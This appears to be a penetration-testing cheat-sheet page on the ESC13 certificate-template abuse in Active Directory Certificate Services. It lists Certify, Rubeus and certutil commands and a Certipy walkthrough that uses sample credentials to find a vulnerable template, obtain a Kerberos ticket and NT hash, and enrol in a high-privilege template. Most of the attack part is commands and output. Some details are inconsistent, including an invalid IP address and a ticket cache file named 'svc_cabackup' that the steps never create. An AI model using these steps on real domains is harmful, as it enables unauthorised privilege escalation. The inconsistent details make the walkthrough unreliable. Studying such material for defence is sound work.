ESC13
If a principal (user or computer) has enrollment rights on a certificate template configured with an issuance policy that has an OID group link, then this principal can enroll a certificate that allows obtaining access to the environment as a member of the group specified in the OID group link.
Windows
Request a certificate of the certificate template <template_name>
.\Certify.exe request /ca:<ca> /template:<template_name>
Save and convert the certificate
certutil -MergePFX .\esc13.pem .\esc13.pfx
Confirm the Client Authentication EKU and the ESC13OID issuance policy
certutil -Dump -v .\esc13.pfx
Authenticate (using the certificate)
.\Rubeus.exe asktgt /user:<user> /certificate:C:\esc13.pfx /nowrap
Linux
At the time of writing (04/03/2024), Certipy doesn't have support for ESC13 so we need to use a speicfic Pull Request to find the vulnerable template.
The scenario
We have valid domain credentials for the user otter
and we can use certipy
to look for misconfigured certificates.
Doing so we find a certificate like the following, which allows users from the SomeGroup
group to enroll in a high-privilege certificate
...
33
Template Name : AnotherCoolTemplate
Display Name : AnotherCoolTemplate
...
Extended Key Usage : Server Authentication
Encrypting File System
Secure Email
Client Authentication
...
Permissions
Enrollment Permissions
Enrollment Rights : MINIONS.COM\SomeGroup
MINIONS.COM\Domain Admins
MINIONS.COM\Enterprise Admins
Object Control Permissions
Owner : MINIONS.COM\Administrator
Write Owner Principals : MINIONS.COM\Domain Admins
MINIONS.COM\Enterprise Admins
MINIONS.COM\Administrator
Write Dacl Principals : MINIONS.COM\Domain Admins
MINIONS.COM\Enterprise Admins
MINIONS.COM\Administrator
Write Property Principals : MINIONS.COM\Domain Admins
MINIONS.COM\Enterprise Admins
MINIONS.COM\Administrator
...
The SomeGroup
group contains the users from the Certificate Services
group so our goal is to find a misconfigured certificate that allows members from Certificate Services
to enroll which will, by proxy, allow us to enroll in the high-privilege certificate that requires the SomeGroup
group; certipy
usually does a pretty good job at pointing these out but it's good to take a look manually at the enrollment permissions of the certificates we find.
You can read more about how this works here.
Setting up Certipy
These are the commands to (safely) set up the certipy
PR for ESC13 support
~ ∮ git clone https://github.com/ly4k/Certipy.git
~ ∮ cd Certipy
Certipy ∮ gh pr checkout 196
Certipy ∮ virtualenv venv
Certipy ∮ source ./venv/bin/activate
(venv) Certipy ∮ python3 setup.py install
Finding the vulnerable certificate
(venv) Certipy ∮ ./venv/bin/certipy find -u 'otter@minions.com' -p 'SomethingSecure123!' -stdout -dc-ip 192.168.100.1001.8 -debug -vulnerable
Certificate Templates
0
Template Name : SomeSecureTemplate
Display Name : SomeSecureTemplate
Certificate Authorities : minions-DC01-CA
...
[!] Vulnerabilities
ESC13 : 'MINIONS.COM\\Certificate Services' can enroll, template allows client authentication and issuance policy is linked to group ['CN=Certificate Managers,CN=Users,DC=minions,DC=com']
Enrolling in the vulnerable certificate
After we found a vulnerable and suitable certificate template we can enroll in it and authenticate with the newly-granted certificate to get a ticket so we can request a new certificate as part of the SomeGroup
group
(venv) Certipy ∮ ./venv/bin/certipy req -u 'otter@minions.com' -p 'SomethingSecure123!' -dc-ip 192.168.100.1001.8 -template 'SomeSecureTemplate' -ca 'minions-DC01-CA' -key-size 4096
...
[*] Saved certificate and private key to 'otter.pfx'
(venv) Certipy ∮ ./venv/bin/certipy auth -pfx otter.pfx -domain minions.com -dc-ip 192.168.100.1001.8
...
[*] Saved credential cache to 'otter.ccache'
[*] Trying to retrieve NT hash for 'otter'
[*] Got hash for 'otter@minions.com': aad3b435b51404eeaad3b435b51404ee:fcd6f8047a642d8d0c9d0e117634e889
Enrolling in the second certificate
(venv) Certipy ∮ export KRB5CCNAME=$PWD/otter.ccache
(venv) Certipy ∮ klist
Ticket cache: FILE: ... /Certipy/svc_cabackup.ccache
Default principal: otter@MINIONS.COM
Valid starting Expires Service principal
03/04/2024 09:35:20 03/04/2024 19:35:20 krbtgt/MINIONS.COM@MINIONS.COM
renew until 04/04/2024 09:34:20
(venv) Certipy ∮ ./venv/bin/certipy req -u 'otter@minions.com' -k -no-pass -dc-ip 192.168.100.1001.8 -template 'AnotherCoolTemplate' -ca 'minions-DC01-CA' -key-size 4096 -target 'dc01.minions.com'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
...
[*] Saved certificate and private key to 'otter.pfx'
(venv) Certipy ∮ ./venv/bin/certipy auth -pfx otter.pfx -domain minions.com -dc-ip 192.168.100.1001.8
Certipy v4.8.2 - by Oliver Lyak (ly4k)
...
[*] Saved credential cache to 'otter.ccache'
[*] Trying to retrieve NT hash for 'otter'
[*] Got hash for 'otter@minions.com': aad3b435b51404eeaad3b435b51404ee:fcd6f8047a642d8d0c9d0e117634e889
(venv) Certipy ∮ export KRB5CCNAME=$PWD/svc_cabackup.ccache
We now have a high-privilege certificate / ticket we can authenticate with.
References
https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53